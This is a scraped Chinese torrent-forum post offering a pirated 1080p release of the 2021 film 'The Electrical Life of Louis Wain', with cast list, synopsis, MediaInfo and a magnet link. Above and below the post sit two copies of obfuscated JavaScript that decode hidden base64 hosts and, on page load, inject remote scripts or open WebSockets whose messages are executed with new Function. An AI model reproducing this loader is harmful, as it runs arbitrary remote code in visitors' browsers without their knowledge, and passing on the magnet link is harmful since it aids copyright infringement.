路易斯·韦恩的激情人生[中文字幕].The.Electrical.Life.of.Louis.Wain.2021.1080p.AMZN.WEB-DL.DDP5.1.H.264 6.57GB

版主小s 23天前 312

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 路易斯·韦恩的激情人生 / 天才猫奴画家(台) / 路易斯·韦恩 / 路易斯·韦恩的电气生活 / Louis Wain / The Nine Lives Of Louis Wain / 路易斯韦恩的迷幻猫世界(港)

◎片 名 The Electrical Life of Louis Wain

◎年 代 2021

◎产 地 英国

◎类 别 剧情 / 传记 / 历史

◎语 言 英语

◎上映日期 2021-09-02(特柳赖德电影节) / 2021-10-22(美国) / 2021-11-05(美国网络)

◎IMDb链接 https://www.imdb.com/title/tt10687506/

◎豆瓣链接 https://movie.douban.com/subject/34663377/

◎片 长 111分钟

◎导 演 福田知盛 Will Sharpe (id:1317339)

◎编 剧 福田知盛 Will Sharpe (id:1317339)

西蒙·斯蒂芬森 Simon Stephenson (id:1458701)

◎演 员 本尼迪克特·康伯巴奇 Benedict Cumberbatch (id:1009405)

克莱尔·芙伊 Claire Foy (id:1274511)

塔伊加·维迪提 Taika Waititi (id:1076354)

奥利维娅·科尔曼 Olivia Colman (id:1004900)

安德丽娅·赖斯伯勒 Andrea Riseborough (id:1040815)

托比·琼斯 Toby Jones (id:1107884)

索菲娅·迪·马蒂诺 Sophia Di Martino (id:1202935)

海莉·斯奎尔斯 Hayley Squires (id:1357690)

阿西姆·乔杜里 Asim Chaudhry (id:1407787)

尼克·凯夫 Nick Cave (id:1049985)

朱利安·巴拉特 Julian Barratt (id:1045126)

斯塔西·马汀 Stacy Martin (id:1334729)

詹米·德米特鲁 Jamie Demetriou (id:1373219)

艾米·卢·伍德 Aimee Lou Wood (id:1408157)

莎朗·鲁妮 Sharon Rooney (id:1331294)

阿迪勒·阿赫塔尔 Adeel Akhtar (id:1352050)

奥利维尔·里希特斯 Olivier Richters (id:1421821)

克里斯塔·克拉克 Crystal Clarke (id:1341238)

丹尼尔·里格比 Daniel Rigby (id:1314877)

安雅·麦肯纳-布鲁斯 Anya McKenna-Bruce (id:1415424)

斯图尔特·斯卡德莫尔 Stewart Scudamore (id:1313127)

印迪卡·沃森 Indica Watson (id:1396498)

玛吉·巴基尔 Maggie Bakir (id:1454332)

卡罗尔·斯蒂尔 Karol Steele (id:1228170)

Oliver Crocker Oliver Crocker (id:1007625)

迈克尔·奥康纳 Michael O'Connor (id:1135533)

◎标 签 本尼迪克特·康伯巴奇 / 传记 / 英国 / 艺术 / 猫 / 2021 / 剧情 / 黑色幽默

◎简 介

本尼迪克特·康伯巴奇和克莱尔·芙伊将主演新片《路易斯·韦恩》,聚焦英国插图画家路易斯·韦恩,8月10日开拍,福田知盛(《那些花儿》)执导。

韦恩以画猫而闻名,曾担任英国猫协主席,他为将近一百多本儿童书籍画过插画,其画经常夸张地模仿人类的行为,嘲讽时代风潮。他晚年可能患有精神分裂症,某些心理学家认为可以从其作品看出端倪,不过也有一些专家对这一说法提出了异议。

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 95432645939072303806401153955079743047 (0x47CBA8B768FE098A38AA2F7894FD6647)

  4. Complete name : The.Electric[email protected]BBQDDQ.COM.mkv

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 6.56 GiB

  8. Duration : 1 h 51 min

  9. Overall bit rate : 8 429 kb/s

  10. Encoded date : UTC 2021-11-08 01:20:32

  11. Writing application : mkvmerge v62.0.0 ('Apollo') 64-bit

  12. Writing library : libebml v1.4.2 + libmatroska v1.6.4


  13. Video

  14. ID : 1

  15. Format : AVC

  16. Format/Info : Advanced Video Codec

  17. Format profile : [email protected]

  18. Format settings : CABAC / 4 Ref Frames

  19. Format settings, CABAC : Yes

  20. Format settings, Reference frames : 4 frames

  21. Codec ID : V_MPEG4/ISO/AVC

  22. Duration : 1 h 51 min

  23. Bit rate mode : Constant

  24. Bit rate : 7 146 kb/s

  25. Nominal bit rate : 10 000 kb/s

  26. Width : 1 920 pixels

  27. Height : 1 080 pixels

  28. Display aspect ratio : 16:9

  29. Frame rate mode : Constant

  30. Frame rate : 23.976 (24000/1001/53354) FPS

  31. Color space : YUV

  32. Chroma subsampling : 4:2:0

  33. Bit depth : 8 bits

  34. Scan type : Progressive

  35. Bits/(Pixel*Frame) : 0.144

  36. Stream size : 5.57 GiB (85%)

  37. Default : Yes

  38. Forced : No

  39. Color range : Limited

  40. Color primaries : BT.709

  41. Transfer characteristics : BT.709

  42. Matrix coefficients : BT.709


  43. Audio #1

  44. ID : 2

  45. Format : E-AC-3

  46. Format/Info : Enhanced AC-3

  47. Commercial name : Dolby Digital Plus

  48. Codec ID : A_EAC3

  49. Duration : 1 h 51 min

  50. Bit rate mode : Constant

  51. Bit rate : 640 kb/s

  52. Channel(s) : 6 channels

  53. Channel layout : L R C LFE Ls Rs

  54. Sampling rate : 48.0 kHz

  55. Frame rate : 31.250 FPS (1536 SPF)

  56. Compression mode : Lossy

  57. Stream size : 510 MiB (8%)

  58. Title : English

  59. Language : English

  60. Service kind : Complete Main

  61. Default : No

  62. Forced : No


  63. Audio #2

  64. ID : 3

  65. Format : E-AC-3

  66. Format/Info : Enhanced AC-3

  67. Commercial name : Dolby Digital Plus

  68. Codec ID : A_EAC3

  69. Duration : 1 h 51 min

  70. Bit rate mode : Constant

  71. Bit rate : 640 kb/s

  72. Channel(s) : 6 channels

  73. Channel layout : L R C LFE Ls Rs

  74. Sampling rate : 48.0 kHz

  75. Frame rate : 31.250 FPS (1536 SPF)

  76. Compression mode : Lossy

  77. Stream size : 510 MiB (8%)

  78. Title : English [Audio Description]

  79. Language : English

  80. Service kind : Complete Main

  81. Default : No

  82. Forced : No


  83. Text

  84. ID : 4

  85. Format : UTF-8

  86. Codec ID : S_TEXT/UTF8

  87. Codec ID/Info : UTF-8 Plain Text

  88. Duration : 1 h 43 min

  89. Bit rate : 68 b/s

  90. Count of elements : 1544

  91. Stream size : 52.0 KiB (0%)

  92. Title : English (SDH)

  93. Language : English

  94. Default : No

  95. Forced : No




复制代码


TAGS 剧情 历史 传记

磁力链:
  • magnet:?xt=urn:btih:AF35200BA57BA6B569613B80206C7E26C0194CFA

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};